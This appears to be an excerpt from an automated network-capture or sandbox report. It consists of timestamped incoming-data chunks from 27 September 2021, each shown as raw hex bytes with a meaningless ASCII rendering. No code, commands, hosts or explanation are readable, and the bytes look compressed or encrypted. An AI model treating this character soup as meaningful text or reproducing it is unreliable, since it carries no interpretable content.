                                      2021-09-27 11:24:29 UTC123INData Raw: ef bb 5a 8b 3f 68 07 55 e6 05 22 53 a5 5c 90 e0 48 50 c4 78 39 c6 d4 d4 d6 fe 59 1e 8a 30 8c ad b8 c6 3a 8c 13 22 c6 c1 cb 9b 25 2d 5c f0 cc ae 56 8b bf 94 c9 0d 22 b2 fe bd 2a 9d 9a 34 df 01 89 37 ac cc 12 e9 5b ec 6a 16 91 f8 53 c0 74 db 76 14 0e 2e 66 96 87 7b c3 5d 98 33 e9 f3 4c ae 31 95 cf 95 aa 90 d0 44 81 62 39 0e cf 17 0d 7a f7 a6 32 ee f4 37 b1 a9 ff 1b b8 b6 c5 7e 12 a3 43 35 ff c4 86 1f 52 64 a4 0d eb 28 2d a9 8e 2a 70 23 16 d0 a6 ae 98 d8 dd 61 4e 11 ce c2 b6 19 b8 e5 c3 b9 54 6e 44 41 eb 70 71 d8 64 f2 eb c8 44 44 27 b9 11 76 7e b3 a2 6b 64 da 77 61 42 b0 5c bc 65 29 ab 1d 30 1d 15 da 39 69 e7 60 d0 99 a9 7c 6a 10 cb 9a b9 91 4e 99 fb 10 18 72 95 50 95 b8 30 ea 47 ff 83 dc 5f 5a f6 a1 95 78 19 45 bf 6f dc 69 d4 7e 6f 45 49 87 85 18 7c b1 5c
                                      Data Ascii: Z?hU"S\HPx9Y0:"%-\V"*47[jStv.f{]3L1Db9z27~C5Rd(-*p#aNTnDApqdDD'v~kdwaB\e)09i`|jNrP0G_ZxEoi~oEI|\
                                      2021-09-27 11:24:29 UTC124INData Raw: 66 15 c9 0d d6 ea 90 03 cc 54 e2 73 bf 45 e8 4d 92 f7 5d 12 60 5b 10 29 14 92 aa 0d 16 d2 5f 55 9a ac 06 a6 57 30 f3 00 85 b5 5a ce c4 f0 98 c2 47 e6 d3 9a 0e e9 70 f2 f5 67 73 9e fc 31 ea 91 ee d0 f7 a6 78 be 26 be e6 6a 48 94 6c d7 f6 d9 96 26 c5 4d 82 0c 27 b3 51 d6 ec c3 1e ed 1a ab 3f dd 94 6e 62 c0 1c 7f dc 5b 87 dd e4 e8 6e 32 86 aa 86 c9 7f c9 c2 7f 04 8a b3 b3 e0 9b aa 96 72 88 68 d5 0d fc 14 3a 90 de cf c6 59 16 57 b5 ae 84 91 14 59 ae a8 88 a6 2c fb a1 c3 5e 20 80 db 37 0b 24 f9 04 de ca be 20 72 9e 0e 28 9f 0c 7d 72 fa 00 f8 02 2a 7d df 44 56 0a 41 22 81 e7 ea cc aa c4 a4 26 c4 3f 1d 27 3d 05 76 8b 15 88 3b 82 1f 45 9e 79 d8 49 20 42 33 8b 00 81 e4 4d 8d 45 de 99 d7 29 8e a9 7e f9 07 38 a1 b5 78 cd ca 63 b2 75 71 fa 1c da 4b c2 a8 7b aa 4c 33
                                      Data Ascii: fTsEM]`[)_UW0ZGpgs1x&jHl&M'Q?nb[n2rh:YWY,^ 7$ r(}r*}DVA"&?'=v;EyI B3ME)~8xcuqK{L3
                                      2021-09-27 11:24:29 UTC125INData Raw: dd ae 86 95 45 40 d8 cc b0 d1 fe d3 8c d3 3f 03 7e 09 62 35 b3 16 f5 4a f3 f7 d2 45 64 cc 2f 19 7e 33 2a 63 e7 db 7d c4 49 aa de 6c a0 9b 3a 77 94 50 9a ef 29 5a ef 8f 21 a2 07 c2 07 52 ba d7 cd 77 93 fe 20 92 c8 dd d5 12 50 c6 bb ae 0a 53 b3 6c 6a 8e f4 0a 4a c1 12 21 43 d6 5e 75 17 e2 a7 18 21 7f 13 eb 1c 09 5c 40 23 06 04 98 5a c4 2d 8b 37 6b c5 c9 e3 a1 34 12 0a 10 5d 15 99 8b 85 a0 c1 15 72 d6 60 39 20 e1 04 0b 54 d8 11 30 79 c3 45 fe 02 e2 13 00 1d 32 18 dd 6a c7 28 bd 38 24 f2 aa 87 85 e1 29 dd 9a 65 61 97 45 14 83 c2 12 26 ac 3f 9d c2 02 b4 b1 cc 85 06 82 4b 6d ea c9 16 6c 19 4d bb 20 37 1f 90 10 a4 b2 e4 41 f0 64 d2 17 d3 5d 45 0e f0 d2 c4 75 9f 15 70 71 ee 7d c3 95 5a e2 d6 fc 7f 52 66 45 5e f7 53 d6 48 9c 1f e7 53 46 25 02 02 14 83 31 84 10 23
                                      Data Ascii: E@?~b5JEd/~3*c}Il:wP)Z!Rw PSljJ!C^u!\@#Z-7k4]r`9 T0yE2j(8$)eaE&?KmlM 7Ad]Eupq}ZRfE^SHSF%1#
                                      2021-09-27 11:24:29 UTC127INData Raw: b8 08 aa 24 a8 3b f9 97 87 d9 7c 1d 6d 4a 0e 07 ab 8e 4d 66 45 de 97 e0 6c 15 8c 59 fb 3e 2b 8e 91 de de ce 7b 53 7d 75 c3 1c a1 32 e9 c2 01 4d 3f 32 a4 c5 cb ae 15 95 1c d0 3f ab e3 ee ad d3 57 6c 09 2b 10 9c 58 94 be 76 3c e3 88 7b 51 a3 a3 d4 ff 4d 65 8d 7f 26 c7 87 90 cd 06 d4 83 49 9e 28 54 e3 9c 40 ef df a8 45 65 20 c5 24 6a e2 67 06 e6 65 d6 85 fe 45 36 ac 32 8c ab cc a8 44 15 00 22 c2 de 91 01 00 01 53 d6 d3 ee eb 3c bd 94 a4 13 31 9a d9 bd 2a 9b bf 5a a1 98 92 37 a8 d2 48 43 77 c1 3f 31 8e b9 76 0b 76 ca 74 01 07 10 24 75 86 7d e3 2c b9 99 e0 f1 5f de 7b 0e ea b2 af b0 e7 9a a1 b7 31 26 a9 09 02 58 d7 d7 14 e9 de 53 dc 34 ef 1f a8 81 ae e0 37 88 5b 9e e7 87 a6 fa 43 62 b5 14 f1 03 a2 ba 88 38 4e 61 a0 48 a7 a4 8d c3 8d d3 42 38 c0 e2 be d0 9f 15
                                      Data Ascii: $;|mJMfElY>+{S}u2M?2?Wl+Xv<{QMe&I(T@Ee $jgeE62D"S<1*Z7HCw?1vvt$u},_{1&XS47[Cb8NaHB8
                                      2021-09-27 11:24:29 UTC128INData Raw: b2 fb 52 75 64 d7 35 f7 42 50 04 4e ac 5d 74 80 00 47 37 76 58 e8 b0 16 83 24 dd 97 52 79 51 db d9 56 f5 6c 83 0d ed dc 38 bc 03 1f 38 b1 5f 1e 33 24 ff 66 08 75 f7 db c0 4a 68 fc 84 ed 4c 44 2a fc b1 0f b1 30 89 37 c8 db a7 6f ff 1f 6e 39 56 af 7f 89 48 15 6d c8 00 0e cf 73 85 4c 7f 9f cc d5 ea 9e 61 23 cf c7 5a b4 75 f5 58 33 f8 58 16 62 3f 82 00 39 94 82 e6 3e b8 2b c9 8f 52 03 af c6 ab da 25 a7 d4 47 a4 6a 59 e0 46 46 fb ff b5 0e 92 f2 d9 9b 1d c2 c7 fe 35 ff 9c f7 f4 da ad 5b b7 54 e5 40 6e 48 90 71 bd 5a f5 94 22 eb 8a ea 72 b4 b0 54 5c 44 cf 02 c9 37 a1 1b c0 9e c8 55 c5 18 57 99 71 aa d5 99 6b 45 5c fc 19 87 c9 68 e6 b2 e5 1c a6 bc 95 f6 e8 8a ba 61 9b 6c f2 3b d5 39 38 90 c9 e1 b3 d9 8e 7a a1 a8 e0 61 8f 7c 87 d9 dc b8 5f d1 df bf 5f 20 95 dd 03
                                      Data Ascii: Rud5BPN]tG7vX$RyQVl88_3$fuJhLD*07on9VHmsLa#ZuX3Xb?9>+R%GjYFF5[T@nHqZ"rT\D7UWqkE\hal;98za|__
                                      2021-09-27 11:24:29 UTC129INData Raw: 6f d5 14 ef 6e 18 8f bc c8 3f 39 9e ed 7a 32 2b 53 b8 f8 d3 ae 33 43 62 b3 21 7f 55 16 b9 88 3a 44 9d de d1 a6 3e ac f1 d8 6f 47 83 ce c4 a1 b4 30 e2 c3 b8 50 40 78 45 fd 61 d7 d1 1a 6b eb 6a 51 62 a4 ad 39 be e5 96 85 6b 46 ee c8 4b 46 b0 7a 3b ef 2e ab 07 19 23 11 cb 39 55 61 bc 58 9e bd 6c 62 40 ca 9a b3 1a 6f a0 c2 1d 3c ea 93 47 18 9f a4 ed 46 ec 9c e5 74 4e e1 2b 33 fe 67 dd 1c 7e de 5d 59 56 a7 44 d3 a8 b9 0e 4e b9 e9 14 ef 29 7a 67 82 09 8f 1a c8 29 55 d6 a9 52 5c 15 84 a6 9d 52 fc d8 87 76 d9 b5 14 b7 7e a1 4a 55 1e dc 27 48 e1 b5 0c 2d a8 d8 7e 3f cb ba 17 bd 70 b8 9a a3 17 53 64 a1 9d 04 98 45 4c 20 8b 27 4d e3 78 8d df ad 33 a1 13 42 05 1c a4 80 82 e5 0a 64 dc 52 47 b9 e0 1b 1c 5c 69 13 30 7f 73 0a ad 89 c5 33 98 02 23 82 d8 f2 ce 0e a2 36 09
                                      Data Ascii: on?9z2+S3Cb!U:D>oG0P@xEakjQb9kFKFz;.#9UaXlb@o<GFtN+3g~]YVDN)zg)UR\Rv~JU'H-~?pSdEL 'Mx3BdRG\i0s3#6
                                      2021-09-27 11:24:29 UTC130INData Raw: ae cf ab 14 94 a4 0c b8 97 d9 ae 0c bd 3e 34 df 01 b3 6f a4 cd 09 c7 7a c1 32 17 97 d2 d4 bf ed cb 74 1a 2c 94 09 77 86 e1 ec 6f d6 26 c1 5d 5b c1 39 b4 af 97 a0 96 e1 f0 ac 60 33 20 83 90 73 e9 fb d5 10 cf 59 3d a2 ad 74 3a 81 8c cb 5a bf a5 54 b8 d8 a7 8e 1e 41 7d ba 23 d0 29 8f be a2 bc 1a 92 df d1 a2 84 27 dc c9 49 fd 30 e3 d5 87 b4 11 e5 c3 b8 67 1a 5d 47 fd 7f d5 7e 66 f2 ec 40 d3 3c aa ac 39 ba 5f 1c a8 7a 60 54 7a 66 54 96 7a 04 e8 2e ab 3d 45 06 13 cb 20 76 cb ef c3 9f bb 42 c4 a6 53 9b b3 84 6a 3d d3 3b 1c e8 b6 6a 0a 99 10 5a 46 ec 85 ed 24 44 e1 2d 06 71 31 69 1f 7e dc 57 42 28 3e 45 49 89 b4 ad 68 99 70 8e ca 04 4b d6 a5 b8 8f 05 c2 21 fe dc a9 54 6c bb d7 3d 9c 54 d2 7a 63 ef d8 b5 8a b2 e1 b3 6c 75 1e f9 0a 59 e7 34 b9 2d a8 c7 54 9d ee b8
                                      Data Ascii: >4oz2t,wo&][9`3 sY=t:ZTA}#)'I0g]G~f@<9_z`TzfTz.=E vBSj=;jZF$D-q1i~WB(>EIhpK!Tl=TzcluY4-T
                                      2021-09-27 11:24:29 UTC131INData Raw: 40 6c 60 a9 01 0d 92 f0 d3 27 63 5b c6 64 14 cd fe 4b f1 25 a2 7d a8 04 85 6e 6b 48 8f 48 84 5f da 96 24 c7 26 fe 95 2c b1 50 78 88 be 98 ec 80 8a 10 cd c9 c8 b0 c0 18 57 a4 3f 8c d7 99 72 48 1a af 82 86 cf 46 7f be e6 38 8b b7 93 3d 9a aa 87 fe be 41 ff 04 dd c0 3a 90 cf eb 50 ac 17 7b be 89 d7 3f 17 59 ac fc 7c d9 b5 f0 89 be 7f f5 8a d0 2b 82 05 d4 07 fc f0 95 21 5e 90 2c e1 eb 0d 7d 69 f6 7f d7 00 20 60 e6 c6 28 82 44 3f 7b c6 10 c2 a8 bf bd 02 e9 29 13 50 e9 05 7c 95 26 5a 30 93 1b 45 b4 af f4 67 35 46 62 88 7f 18 e1 33 fb 64 09 93 ff 50 15 8c 59 e6 3e 14 65 b1 78 dc ee 8c 47 74 5d f1 3f 89 19 c1 a8 79 fe b8 4c 39 db f6 30 10 60 12 f6 20 0c e6 6c bd f5 77 a3 21 06 12 bc 46 b2 d4 08 ba c3 a0 52 4c 9d 3f db 54 3d da 93 41 02 57 5c 90 cd 11 66 8b 66 8c
                                      Data Ascii: @l`'c[dK%}nkHH_$&,PxW?rHF8=A:P{?Y|+!^,}i `(D?{)P|&Z0Eg5Fb3dPY>exGt]?yL90` lw!FRL?T=AW\ff
                                      2021-09-27 11:24:29 UTC132INData Raw: 71 b1 5d 16 ef 2f 70 72 fb 90 8e 05 c6 21 81 d4 a9 54 ec b6 d7 2e ba 72 01 f8 1d 76 f9 a5 80 92 53 ae 44 58 86 dc 21 62 43 6a 92 2c a8 c3 54 ed e6 b8 17 21 7f 13 f5 1c 36 a9 60 81 06 24 8f 4b d6 05 bb 1d 46 c1 e3 8b f5 2b 6d 93 15 42 01 23 55 a8 af e7 90 47 db c6 1f 00 1a 1b 18 7c d5 0d 3e 7f e9 30 8d b3 ce 11 04 04 09 00 86 de c8 0e a6 09 f8 35 aa 87 1f dc 2c e1 be 45 9b bd 2f 6a 3a e8 1c 22 b3 33 2f ca 2d ba 91 f9 11 58 d2 4a 6d ee f4 c3 41 1b 4d 27 2f 74 73 2f 31 59 b6 fb 52 4a 72 f1 18 f5 5d 4d 06 0d d0 c4 73 aa 86 26 c5 ed 7d c1 9f ce 9c 4f fd e5 73 54 40 e2 f2 80 d8 6e 83 2b 89 bc 46 25 15 37 11 ac 33 82 3c 8b 8e d9 16 19 d3 08 3b 4a 68 e3 0b e0 4c 57 0c da 64 65 cf a9 a8 78 c2 c4 ca ef f2 1f 62 1f 4f e8 dd ff d4 14 6d d0 08 23 cc 73 83 fc 34 cc 44
                                      Data Ascii: q]/pr!T.rvSDX!bCj,T!6`$KF+mB#UG|>05,E/j:"3/-XJmAM'/ts/1YRJr]Ms&}OsT@n+F%73<;JhLWdexbOm#s4D
                                      2021-09-27 11:24:29 UTC134INData Raw: f4 6d 22 a0 da ed 1c 1d ba 12 f0 0a 10 bd d8 ae d3 53 5b 01 07 12 9c c4 9b f9 1a 83 c2 a8 7e 4e 9d 19 a9 c2 43 43 8d 4e 2e 5a 87 90 cb 3b 7e d0 d2 9f 2e 7a a9 c3 d8 ee df 36 7f 77 ab c6 29 45 c5 78 39 e6 b3 c4 85 fe 47 36 ac 32 8c ab cc 40 44 15 00 22 c2 e1 f3 9a 25 2c c6 d5 e1 bc ed ab 9d 95 a4 0c 02 dd e4 bf 2a 82 9f 1c f2 03 93 31 86 4f 77 40 53 ec 34 37 b2 f9 56 c1 ee ef 59 0f 2a 18 2a 76 86 7b e9 3b d7 00 e1 ec 73 ec 3b 94 c9 b5 26 e8 61 d9 81 66 13 02 a8 16 0d ea df f8 06 c9 d4 19 a3 ad ee 3f 2c 8e ed 7a 0d ac 7c 95 fa c4 80 34 c7 1c 2c 0a fd 2f af 9d 89 3e 64 91 fb fc b4 82 a9 f9 c8 49 67 35 47 d4 a1 94 a0 ee eb 95 45 68 53 6d 7b 19 64 52 64 f6 ca 4c 54 42 33 37 1c 93 6d 95 88 5c 61 ce 5f 6b d2 a0 5a ab f7 23 83 30 33 0e 15 e1 b9 01 7a c3 c1 9b 9d
                                      Data Ascii: m"S[~NCCN.Z;~.z6w)Ex9G62@D"%,*1Ow@S47VY**v{;s;&af?,z|4,/>dIg5GEhSm{dRdLTB37m\a_kZ#03z
                                      2021-09-27 11:24:29 UTC135INData Raw: 84 8c 2c dd 52 31 39 91 29 c4 4a 48 6b 83 c5 61 59 09 d2 b6 67 cf af a2 b1 b2 5d cb f5 de 12 27 1e 49 c2 c5 a4 60 07 4b f4 6f 22 cd 73 a3 cd 03 e1 55 cb ce b2 53 4f 55 e4 5d 3d 2d 73 37 13 f2 7d 5e 63 20 92 b2 31 bb 90 c6 34 9a 54 50 8e 72 c8 a2 a9 31 e0 07 81 df 5a cb 4c 6d 63 38 df e7 d7 9c 2c db f5 f3 f5 f9 7e eb ec 17 c0 a5 6c d1 f7 82 a3 ba 24 c5 7a 4f 60 bd 6c ac 74 f2 10 5c 74 a1 80 08 0d fb 55 58 5b 24 bd c1 08 89 1d 95 ee e8 63 e0 1a 44 84 59 98 c4 b1 40 6d 32 84 aa 00 b7 f5 f8 c0 7b 19 c0 b2 b3 e9 00 8f aa 76 bd 4c a6 23 fd 14 1a 85 dc cb dd b8 33 53 8c ae ff 14 3f df d4 4f fb a7 28 d1 c5 bb 5f 20 10 f5 06 0a 06 d9 59 db d0 40 01 67 83 0c 53 ff 28 55 5b d0 57 fc 28 a6 18 55 41 56 1f 65 72 7e e6 c6 58 8d 92 35 01 e4 76 34 70 3f 25 22 86 06 8c 24
                                      Data Ascii: ,R19)JHkaYg]'I`Ko"sUSOU]=-s7}^c 14TPr1ZLmc8,~l$zO`lt\tUX[$cDY@m2{vL#3S?O(_ Y@gS(U[W(UAVer~X5v4p?%"$
                                      2021-09-27 11:24:29 UTC136INData Raw: 12 c1 7c c2 b8 43 48 38 46 fd 67 67 76 49 e0 cc 4a 38 43 33 ad 19 36 6a b3 a8 65 6b e6 72 49 46 b6 70 2d 96 b7 aa 1d 35 2e 7d ca 3f 7f 79 e7 ec 8d 9b 48 2c d9 ca 9a 93 13 5f 8d d3 24 10 5a be 45 18 b9 1a 6c 38 75 84 cd 5d 6c 8e 2c 19 78 83 61 30 6c fc 5d af 57 a7 44 69 12 81 1c 68 86 50 3c c2 2b 5a f6 af 8f f1 9c c3 01 7c f4 d9 55 76 93 60 1a b1 40 de d8 6d 77 d9 b5 ae 2d 46 b3 6c 6a 89 f4 0a 4a c1 12 21 ab d6 5e 75 17 e2 98 66 ba 5a 3e 7e 1f 3b 41 46 a1 77 05 98 45 f6 c9 b3 35 6b dc ef a5 f2 af 13 0c 3e c4 7b 9a af a8 ab c7 78 63 f6 d4 a3 05 cc 09 3e 5c 87 12 30 7f c9 f7 95 9b e3 0c 0e 2a 0e 80 f8 41 e3 88 dc b0 05 35 ae a7 f6 f8 01 f0 02 40 4a af 09 4a 69 c2 12 22 93 cf 12 e7 2f a5 9c fb ba 24 4b 4d 47 6c aa a7 40 1b 49 9d 7e 58 61 09 8b 81 9b e9 74 4a
                                      Data Ascii: |CH8FggvIJ8C36jekrIFp-5.}?yH,_$ZEl8u]l,xa0l]WDihP<+Z|Uv`@mw-FljJ!^ufZ>~;AFwE5k>{xc>\0*A5@JJi"/$KMGl@I~XatJ
                                      2021-09-27 11:24:29 UTC137INData Raw: 8a f0 f5 0f 20 f9 0c f2 fd 42 21 58 ba 8e 2d 79 0c 7d 72 f2 c3 fb 02 20 fc e9 6d 47 3d 65 ab 7e e6 c6 e2 49 a8 27 27 df 13 18 72 3f 03 56 17 78 15 3a 93 1f 7a 00 86 d9 65 af 65 65 1f 27 a1 75 32 ff 44 fe 75 e8 50 8f b4 5c d9 1a 34 b4 9b fa a2 57 7a 4c 70 7d 78 1f a1 34 59 8d 52 c5 18 12 36 db f6 34 10 55 05 f6 20 8c eb 6c ad d3 51 51 a7 78 8b 9d 5e ba f4 9f a4 e2 88 e5 6b b0 2b d7 f2 d4 42 92 41 26 86 92 90 cd 0e ec 86 66 9c 2e 78 a3 64 a7 77 de ac 5e 7a 22 e1 09 64 5e 5d 14 d4 f2 f4 1d ff 59 1e a1 31 94 ad e6 d9 37 a4 2c 20 c6 c7 fb 1d 5b b5 5d f0 c8 8e 52 8a bf 94 3e 29 0f a0 d2 9f b3 9c 95 34 ff 0f 8b 37 ac d2 06 f1 7f ee 30 11 bb 7a 28 58 75 ca 70 3e 96 39 09 77 1c 5e e4 53 e1 20 7b f0 5b c1 19 89 d7 9f a0 8e d0 f5 83 62 35 0c 2f 68 94 71 fa d1 34 74
                                      Data Ascii: B!X-y}r mG=e~I''r?Vx:zeee'u2DuP\4WzLp}x4YR64U lQQx^k+BA&f.xdw^z"d^]Y17, []R>)470z(Xup>9w^S {[b5/hq4t
                                      2021-09-27 11:24:29 UTC139INData Raw: 82 41 1d 35 aa 9b ad d4 03 f0 9e 4f e5 c3 b6 6b 1a c7 32 99 b2 2d 07 7d 0a 97 86 f5 b7 9d 4a 4b 6d ca ba 27 41 1b 50 95 27 5b 61 0f 3b 22 c8 62 53 6a 45 df a4 f4 42 56 b4 05 ff d6 53 a0 b8 59 5c ec 5d b0 a6 30 9c 50 e5 57 7b 7b 51 c2 f8 fc a6 f7 82 0b c3 92 fb 24 02 1f a6 8b 1e 95 30 29 4d 41 17 19 f7 a5 dd 4a 68 fe b9 e8 63 46 2c d0 19 1b 56 a8 88 33 ec 7a cb f5 da a8 45 32 58 e4 7f 3f 4c 15 6d f4 bc 3a cd 73 9f 4e 3c e3 55 d2 c0 1c 00 d4 54 e2 73 9b ec eb 36 13 6c 78 3b 70 06 b2 97 15 96 82 c0 8e cb 55 50 91 5b 2f 9d ab 31 f9 22 2f 8c c1 ca 4a 43 c5 86 47 e6 d7 02 29 bf e6 d5 d5 a3 5a c6 fe 11 43 f5 6d d1 e8 8e 55 85 26 c5 63 41 ca ee f7 ad 72 dc b6 e3 ec a0 80 96 08 9c 45 7e 7b 7f 99 ec 1a 8f f2 c6 ef e8 7d e8 35 55 84 5f ad 55 e7 f4 6e 32 86 a0 44 c8
                                      Data Ascii: A5Ok2-}JKm'AP'[a;"bSjEBVSY\]0PW{{Q$0)MAJhcF,V3zE2X?Lm:sN<UTs6lx;pUP[/1"/JCG)ZCmU&cArE~{}5U_Un2D
                                      2021-09-27 11:24:29 UTC140INData Raw: ac cd 29 87 49 ec 30 0e b9 d5 54 c1 72 e0 f6 60 95 39 09 73 a6 99 c8 42 c7 9a c4 dc 4a e7 19 76 ce 9f a0 b6 99 c3 81 62 2e 0e 84 14 0d 76 d0 53 6a 76 f5 3d a6 8d 0d 1e ac 9e 77 5f 3f b7 72 98 1b c5 86 1e 61 0a ae 0b fd 34 9a 90 a5 3c 64 0d f4 57 d8 3d 88 dc cd 69 83 14 ce c4 3b b1 92 f7 e5 98 a3 69 55 47 dd 1a e6 53 64 ed e3 42 78 40 33 ab 13 38 01 2a a9 7a 64 ee ba 4a 46 b0 c0 8e c5 3c 8d 3d d4 0f 13 cb 1f f9 f8 c2 c1 80 b7 40 6f da ca 9c 99 06 34 14 d2 3b 18 52 75 46 18 bf aa cf 6b fe a3 ed bf 4d e1 2d 39 e8 02 44 1d 61 d1 55 ed 54 a7 42 63 0f ea 85 69 99 74 34 08 28 5a f0 1f 2c a2 14 e4 21 9f d5 a9 54 56 08 e1 3f 9c 4e d0 d5 1f 76 df 9f 0c ec ca b2 6c 71 a4 34 26 48 c1 8e 2e 00 b9 e1 54 ff e7 b8 17 9b fb 25 e4 3a 0b 7b 4d 83 06 02 b2 c3 a8 9c a7 35 6f
                                      Data Ascii: )I0Tr`9sBJvb.vSjv=w_?ra4<dW=i;iUGSdBx@38*zdJF<=@o4;RuFkM-9DaUTBcit4(Z,!TV?Nvlq4&H.T%:{M5o
                                      2021-09-27 11:24:29 UTC141INData Raw: f7 a2 5d a0 39 c5 65 75 60 bd 6c ac 74 f2 10 5c 74 a1 80 08 0d b8 56 58 5b 24 bd c1 08 89 1d d6 ed e8 63 e0 08 4a 84 59 98 dc b1 40 6d 32 84 aa 00 b7 f5 f8 c0 7b 19 81 b1 b3 e9 00 8f aa 76 bd 4c e7 20 fd 14 1a 8b d2 cb dd b8 1b 53 8c ae ff 14 3f df d4 4f fb a7 28 d1 82 b8 5f 20 10 f5 06 0a 06 d9 1e d8 d0 40 01 79 8d 0c 53 ff 00 55 5b d0 57 fc 28 a6 18 55 41 56 1f 65 33 7d e6 c6 58 8d 92 35 01 e4 37 37 70 3f 25 48 88 06 8c 24 9d 33 77 97 87 df 4f b3 3e d1 0f 01 85 c0 3e fd 44 de 09 da 7d 9d 8f 54 f9 1a 34 b2 91 3a c1 ce 7b 53 66 75 c3 1c a1 32 e9 2e 01 4d 3f 32 a4 fa f8 36 30 b8 88 d3 0d 84 e5 61 a1 d1 57 7b 01 52 0f 9c 5e a1 c7 20 88 e0 88 79 64 1b 47 68 d3 43 47 b2 4e 04 77 85 0a e8 3c ee 88 6b 91 2c 7e 89 c2 be f3 df ac 45 4c 92 cd 0b 64 c2 52 bf b8 4d
                                      Data Ascii: ]9eu`lt\tVX[$cJY@m2{vL S?O(_ @ySU[W(UAVe3}X577p?%H$3wO>>D}T4:{Sfu2.M?260aW{R^ ydGhCGNw<k,~ELdRM
                                      2021-09-27 11:24:29 UTC143INData Raw: 93 60 1a b1 40 de d8 32 74 d9 b5 ae 37 73 b3 6c 6a 89 f4 0a 4a c1 12 21 ab d6 5e 75 17 e2 98 27 b9 5a 3e 7e 1f 3b 41 46 a1 36 06 98 45 f6 b7 86 35 6b dc ee a5 f2 af 13 0c 3e c4 7b 9a af a8 ab c7 3b 60 f6 d4 a3 05 cc 09 3e 5c c4 11 30 7f c9 90 a0 9b e3 0c 0f 2a 0e 80 f8 41 e3 8c dc b0 05 35 ae a7 b7 fb 01 f0 02 40 4a ac 09 4a 28 c1 12 22 93 e7 27 e7 2f a7 bf fe 95 26 4d 61 eb 94 4d 3f 41 1f 6d 8e 08 59 61 93 34 89 a4 dd 72 59 43 ff 18 d5 93 76 2e 20 cd f5 5d ad 06 58 5a c6 fb bb 26 31 9c 4b dd 4b 54 79 51 5e f7 53 ca 48 a3 3f c5 b2 46 05 00 3e 3c ae 2c 8e 3e 24 f2 40 11 33 51 56 5d 4b 68 e7 b1 f0 63 46 2a 60 be 48 dd 8f a8 02 ce c4 ca d5 d6 13 60 1f 56 ed 77 ac 4f 15 6b fe ae 5d 54 72 83 62 31 d7 57 d4 ea 00 5b 60 47 c4 57 8d 51 ea 36 33 cd 7c 16 62 3f 99
                                      Data Ascii: `@2t7sljJ!^u'Z>~;AF6E5k>{;`>\0*A5@JJ("'/&MaM?AmYa4rYCv. ]XZ&1KKTyQ^SH?F><,>$@3QV]KhcF*`H`VwOk]Trb1W[`GWQ63|b?
                                      2021-09-27 11:24:29 UTC144INData Raw: 20 06 16 bc 08 bc d4 08 3f c7 a5 6d 68 bd 6f f3 d2 43 63 da 62 06 77 9a 88 e5 3c fe ae 4d b4 a8 00 10 e3 d9 ea ff fb 58 5a ba 7a 2c 49 d6 5e 19 91 d6 d4 85 de 39 3d 81 30 93 bd ce eb 38 8c 07 08 40 bf 48 9a 25 28 7c a8 ce ae cb 11 9a b9 b6 2a 02 ea f6 bf 2a bd e5 17 df 01 8c 2f 84 e0 0b d9 54 c6 b6 69 08 f9 56 c5 54 93 76 1e 0c a2 2c 5a 94 5d e9 1b c5 00 e1 d1 d3 e2 39 94 d0 90 88 bb fa d8 87 48 b1 58 30 17 0d 74 da 8f 16 ef f4 a7 87 80 ff 39 8c c4 ef 7a 12 85 c3 9b f8 c4 98 36 6c 60 b5 0d d7 ad f1 21 89 3e 60 2b 85 d3 a6 a4 13 f9 e4 5b 41 35 95 c6 a1 94 9f 7a e0 b8 47 77 4d 6f d0 65 fd 55 4e 70 94 f3 54 42 37 8d 65 bc 7f b3 32 5f 4d df 79 6b 1a b2 5a ab c8 99 88 1d 31 14 3b e6 3d 7f e5 e8 43 e1 24 69 42 dc ea c7 b1 80 4a 17 f6 16 0d 54 b3 1a 1a bf 30 ca
                                      Data Ascii: ?mhoCcbw<MXZz,I^9=08@H%(|**/TiVTv,Z]9HX0t9z6l`!>`+[A5zGwMoeUNpTB7e2_MykZ1;=C$iBJT0
                                      2021-09-27 11:24:29 UTC145INData Raw: 8c 4d e2 ab 88 31 e6 46 b4 6c db 32 64 3f 34 c0 5f 81 d7 30 40 c5 0e 03 b0 71 83 66 31 47 70 d4 ea 8d 56 60 57 e2 71 91 d5 94 af 12 f6 59 36 1c 22 92 28 8e b3 af f2 32 f2 2b 52 8e 52 27 17 8c 31 ff 17 a6 da 75 c9 4a 41 cf c0 38 7f d6 98 08 b2 8b f1 f5 63 c1 e3 d3 23 c6 cc 12 d3 f7 a2 5d 1e 01 c5 65 74 46 b8 43 ae 72 de bc a4 93 39 81 0c 29 91 d4 5a 5b be 02 c9 37 bd 1b ff 6f ea 63 c0 38 93 a1 59 87 c8 85 45 42 30 82 86 ac 4f 12 60 c1 7f 3d ab 32 b1 e9 9a 30 a2 49 89 4a cd a3 ff 14 3a b0 2f ee dd a7 08 66 89 81 fd 12 13 73 2c a8 63 a6 2c f5 a9 38 5d 20 8a 4a 0e 35 32 df 35 58 d2 40 21 7e 6d 29 53 e0 12 70 5e ff 55 fa 04 0a e0 b2 d9 57 1b 41 1f fc e4 c6 c2 32 9a 0a 35 e2 1b b6 72 3f 05 5c 9f 20 8c 3b 8c 0f 72 b8 85 d9 63 1f c6 36 97 00 81 e4 13 7b 46 de 93
                                      Data Ascii: M1Fl2d?4_0@qf1GpV`WqY6"(2+RR'1uJA8c#]etFCr9)Z[7oc8YEB0O`=20IJ:/fs,c,8] J525X@!~m)Sp^UWA25r?\ ;rc6{F
                                      2021-09-27 11:24:29 UTC146INData Raw: fb 52 72 69 d2 1a f5 44 7c ac 5e 4b c5 75 84 24 cb 5e ec 7d 5f 9a 1d 8d 69 dd ec 54 79 51 e4 61 58 d8 6e 94 23 ea b0 46 23 28 9d 42 37 32 84 12 29 64 42 17 19 4d 0d e9 5b 4e c3 05 c7 61 46 0a 4e bd 65 cf b1 a0 1a ce c4 cc df 58 4c f9 1e 49 c6 7f 14 4f 15 6d 4e 0d 0e dc 55 a3 f3 13 e1 55 f4 5c bc 7e 4d 42 ca 5a b9 53 ec 1c 91 88 c4 17 62 24 b2 be 16 96 82 7a 31 ff 44 76 ae c4 05 b0 a9 11 48 2e a9 f2 40 e3 67 45 e5 40 6c 64 a9 01 0d 92 f0 d3 62 61 5b c6 64 14 cd fd 4b f1 60 a0 7d a8 04 7c 43 6b 48 87 46 81 70 d8 90 08 6f de 19 0d 2d b5 74 c0 59 be 98 76 3f 82 2c f9 cf 70 61 c0 18 77 3e 7f 87 d7 81 45 42 30 82 86 ac 4b 12 60 c1 7f 3d ab 2a b1 e9 9a 30 a2 49 8a 4a cd bb ff 14 3a b0 73 ed dd a7 00 53 8c ae ff 14 3f db d4 4f fb a7 28 d1 13 b8 5f 20 10 f5 06 09
